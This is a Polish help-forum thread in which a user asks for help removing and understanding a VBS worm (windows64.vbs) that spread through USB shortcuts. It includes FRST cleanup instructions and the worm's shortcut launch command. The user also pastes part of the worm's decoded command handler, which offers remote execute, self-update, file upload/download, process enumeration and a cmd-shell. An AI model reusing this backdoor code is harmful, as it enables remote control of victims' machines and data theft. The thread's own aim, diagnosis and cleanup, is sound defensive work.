Cześć, mam dość ciasno zabezpieczony komputer zewnętrzene oprogramowanie nie ma dostępu do sieci. ale 8 dni temu uruchomiłem instalator niby podpisany cyfrowo ale wbił mi plik VBS do auto-startu A przez te skrypty można łączyć sie z siecią za pomocą systemowych programów. Wczoraj zauważyłem to i sprawdziłem program to badziewie dodaje na wstępie przy samym fakcie uruchomienia instalatora.

Moim problemem jest że nie mogę/nie umiem przeanalizować tego skryptu. Tam są masowo zmienne Char  Próbowałem je wyświetlić ale wychodzą tylko cyferki i gwiazdki.

To co wiem że program robi… Na pendrive Ukrywa oryginalne na nim pliki następnie tworzy skrót który uruchamia ten skrypt a po nim plik do którego jest jest sworzony skrót.

Np: C:\WINDOWS\system32\cmd.exe /c start windows64.vbs&start explorer System" “Volume” "Information&exit

Tutaj pełny kod pliku "windows64.vbs

http://wklej.co/paste/1549

Skan TotalVirus [Antywirusy go nie widzą]:

https://www.virustotal.com/en/file/50c61d4d9020ed63e1486aa7c7d65b23886d879a2a43a3a7bc040525bd0bd1a9/analysis/1434437460/

Plik wirusa windows64.vbs:

Nie podłączyłeś żadnego pendrive.

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :

CloseProcesses:
Startup: C:\Documents and Settings\Redivivus-Ignis\Menu Start\Programy\Autostart\windows64.vbs [2015-06-16] ()
SearchScopes: HKU\S-1-5-21-1085031214-515967899-682003330-1004 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
EmptyTemp:

Uruchom FRST i kliknij Fix. Pokaż raport z usuwania Fixlog.

Kliknij Scan i pokaż nowy raport z FRST bez Addition i Shortcut.

FixLog http://wklej.org/id/1739512/

FRST http://wklej.org/id/1739515/

Proszę.

Szkoda że te logi dla mnie sa czarna magią

Zawartość w tej chwili Pendriva

http://zapodaj.net/315c0fbfab712.png.html

Dodam że każdy plik folder jest automatycznie ukrywany i dodaje się skrót do tego pliku i folderu i automatyczne autouruchomienie pliku windows64

Bardzo ważne jest dla mnie co ten plik mógł zrobic z moimi plikami nie umiem przeczytać tego skryptu za dużo tam przeróbek w kodzie ASCII, ANSI. W ciagu tego tygodnia mogło mi się coś uszkodzić. A bardzo mi zależy aby szkody wykryć jak naszybciek a mam za duzo plików aby je pokolei sprawdzać.

Przestań uruchamiać ten skrypt lub skrót, bo w ten sposób infekujesz system.

Przecież wiesz co robi ten skrypt, bo się przekonałeś o tym na własnym systemie.

Skasuj folder C:\FRST

Dysk przeskanuj ESET Online Scanner

Aby go rozkodować w pętli musiałem go odpalić, aby wszytkie znaki które są kodowane przepisały się od nowa.

Ale nie jestem głupi użyłem wirtualnej maszyny do wykonania tego.

Usunięty folder. w skanie nie widać dysku D bo go odłączyłem lepiej by było abym mial tam wszytkie pliki nie uszkodzone. Tylko gdyby ten wirus coś zrobił z nimi to chce wiedzieć co ten badziew może robić

Tutaj widać komendy które mogły być wysłane do kompa

między innymi:

Aktualizacja 

Wysłanie pliku z i do komputera

chyba jakieś uruchomienia

to wydaje mi się są komendy jakie może ten łoś od wirusa wysłać wiem że napewno nie odbierał mój komputer tych komend Połączenia kompa tylko na wychodzące ustawione nie powiino dać się odebrać polecenia z sieci.

select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //b " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case "enum-driver"
      post "is-enum-driver",enumdriver  
case "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case "enum-process"
      post "is-enum-process",enumprocess   
case "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case "delete"
      param = cmd (1)
      deletefaf (param) 
case "exit-process"
      param = cmd (1)
      exitprocess (param) 
case "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

no oczywiście wiemy też że się powiela i ustawia skróty coś jeszcze?